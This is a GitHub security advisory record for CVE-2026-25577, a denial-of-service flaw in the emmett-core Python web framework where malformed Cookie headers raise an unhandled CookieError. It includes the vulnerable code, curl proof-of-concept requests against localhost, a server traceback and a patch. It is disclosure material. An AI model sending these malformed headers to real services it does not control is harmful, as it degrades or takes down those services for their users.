GHSA-X6CR-MQ53-CC76

Vulnerability from github – Published: 2026-02-10 14:33 – Updated: 2026-02-10 19:56
VLAI?
Summary
Emmett-Core: Unhandled CookieError Exception Causing Denial of Service
Details

Summary

The cookies property in emmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.

Details

Location: emmett_core/http/wrappers/__init__.py (line 64)

Vulnerable Code:

@cachedprop
def cookies(self) -> SimpleCookie:
    cookies: SimpleCookie = SimpleCookie()
    for cookie in self.headers.get("cookie", "").split(";"):
        cookies.load(cookie)  # No exception handling
    return cookies

PoC

Sending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.

$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:/security=test"
Internal error
Time: 0.024363s

After the same error occurs several times, the server cannot process it normally.

$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:(security=test"
Internal error
Time: 60.069334s

$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:security=test"
Internal error
Time: 60.074031s

This is server log.

[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py", line 70, in dynamic_handler
    http = await self.router.dispatch(request, response)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/router.py", line 240, in dispatch
    return await match.dispatch(reqargs, response)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py", line 57, in dispatch
    await self._parallel_flow(self.flow_open)
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py", line 17, in _parallel_flow
    raise task.exception()
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/sessions.py", line 102, in open_request
    if self.cookie_name in self.current.request.cookies:
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/utils.py", line 37, in __get__
    obj.__dict__[self.__name__] = rv = self.fget(obj)
                                       ~~~~~~~~~^^^^^
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/http/wrappers/__init__.py", line 64, in cookies
    cookies.load(cookie)
    ~~~~~~~~~~~~^^^^^^^^
  File "/usr/lib/python3.13/http/cookies.py", line 516, in load
    self.__parse_string(rawdata)
    ~~~~~~~~~~~~~~~~~~~^^^^^^^^^
  File "/usr/lib/python3.13/http/cookies.py", line 580, in __parse_string
    self.__set(key, rval, cval)
    ~~~~~~~~~~^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.13/http/cookies.py", line 472, in __set
    M.set(key, real_value, coded_value)
    ~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.13/http/cookies.py", line 335, in set
    raise CookieError('Illegal key %r' % (key,))
http.cookies.CookieError: Illegal key '/security'

Impact

This vulnerability allows unauthenticated attackers to cause denial of service and performance degradation by sending malformed Cookie headers. After this vulnerability occurs, we expect it to be difficult to use the normal service.

patch

/emmett_core/http/wrappers/__init__.py

- from http.cookies import SimpleCookie 
+ from http.cookies import SimpleCookie, CookieError  # add CookieError
...
...
    @cachedprop
    def cookies(self) -> SimpleCookie:
        cookies: SimpleCookie = SimpleCookie()
        for cookie in self.headers.get("cookie", "").split(";"):
-           cookies.load(cookie)
+           try:
+               cookies.load(cookie)
+            except CookieError:
+                continue
        return cookies
Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.3.10"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "emmett-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25577"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248",
      "CWE-703"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T14:33:15Z",
    "nvd_published_at": "2026-02-10T18:16:37Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `cookies` property in `emmett_core.http.wrappers.Request` does not handle \n`CookieError` exceptions when parsing malformed Cookie headers. This allows \nunauthenticated attackers to trigger HTTP 500 errors and cause denial of service.\n\n\n### Details\n\n**Location:** `emmett_core/http/wrappers/__init__.py` (line 64)\n\n**Vulnerable Code:**\n```python\n@cachedprop\ndef cookies(self) -\u003e SimpleCookie:\n    cookies: SimpleCookie = SimpleCookie()\n    for cookie in self.headers.get(\"cookie\", \"\").split(\";\"):\n        cookies.load(cookie)  # No exception handling\n    return cookies\n```\n\n### PoC\nSending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.\n```bash\n$ curl -w \"\\nTime: %{time_total}s\\n\" http://localhost:8000/ -H \"Cookie:/security=test\"\nInternal error\nTime: 0.024363s\n```\nAfter the same error occurs several times, the server cannot process it normally.\n```bash\n$ curl -w \"\\nTime: %{time_total}s\\n\" http://localhost:8000/ -H \"Cookie:(security=test\"\nInternal error\nTime: 60.069334s\n\n$ curl -w \"\\nTime: %{time_total}s\\n\" http://localhost:8000/ -H \"Cookie:security=test\"\nInternal error\nTime: 60.074031s\n```\n\nThis is server log.\n```bash\n[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:\nTraceback (most recent call last):\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py\", line 70, in dynamic_handler\n    http = await self.router.dispatch(request, response)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/router.py\", line 240, in dispatch\n    return await match.dispatch(reqargs, response)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py\", line 57, in dispatch\n    await self._parallel_flow(self.flow_open)\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py\", line 17, in _parallel_flow\n    raise task.exception()\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/sessions.py\", line 102, in open_request\n    if self.cookie_name in self.current.request.cookies:\n                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/utils.py\", line 37, in __get__\n    obj.__dict__[self.__name__] = rv = self.fget(obj)\n                                       ~~~~~~~~~^^^^^\n  File \"/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/http/wrappers/__init__.py\", line 64, in cookies\n    cookies.load(cookie)\n    ~~~~~~~~~~~~^^^^^^^^\n  File \"/usr/lib/python3.13/http/cookies.py\", line 516, in load\n    self.__parse_string(rawdata)\n    ~~~~~~~~~~~~~~~~~~~^^^^^^^^^\n  File \"/usr/lib/python3.13/http/cookies.py\", line 580, in __parse_string\n    self.__set(key, rval, cval)\n    ~~~~~~~~~~^^^^^^^^^^^^^^^^^\n  File \"/usr/lib/python3.13/http/cookies.py\", line 472, in __set\n    M.set(key, real_value, coded_value)\n    ~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/usr/lib/python3.13/http/cookies.py\", line 335, in set\n    raise CookieError(\u0027Illegal key %r\u0027 % (key,))\nhttp.cookies.CookieError: Illegal key \u0027/security\u0027\n```\n\n### Impact\nThis vulnerability allows unauthenticated attackers to cause denial of service \nand performance degradation by sending malformed Cookie headers. \nAfter this vulnerability occurs, we expect it to be difficult to use the normal service.\n\n\n\n### patch \n`/emmett_core/http/wrappers/__init__.py`\n```python\n- from http.cookies import SimpleCookie \n+ from http.cookies import SimpleCookie, CookieError  # add CookieError\n...\n...\n    @cachedprop\n    def cookies(self) -\u003e SimpleCookie:\n        cookies: SimpleCookie = SimpleCookie()\n        for cookie in self.headers.get(\"cookie\", \"\").split(\";\"):\n-           cookies.load(cookie)\n+           try:\n+               cookies.load(cookie)\n+            except CookieError:\n+                continue\n        return cookies\n```",
  "id": "GHSA-x6cr-mq53-cc76",
  "modified": "2026-02-10T19:56:59Z",
  "published": "2026-02-10T14:33:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/emmett-framework/core/security/advisories/GHSA-x6cr-mq53-cc76"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25577"
    },
    {
      "type": "WEB",
      "url": "https://github.com/emmett-framework/core/commit/9557ea23a27cbadf7774d8bca6bbe4b54fa8a3ec"
    },
    {
      "type": "WEB",
      "url": "https://github.com/emmett-framework/core/commit/c126757133e118119a280b58f3bb345b1c9a8a2a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/emmett-framework/core"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Emmett-Core: Unhandled CookieError Exception Causing Denial of Service"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.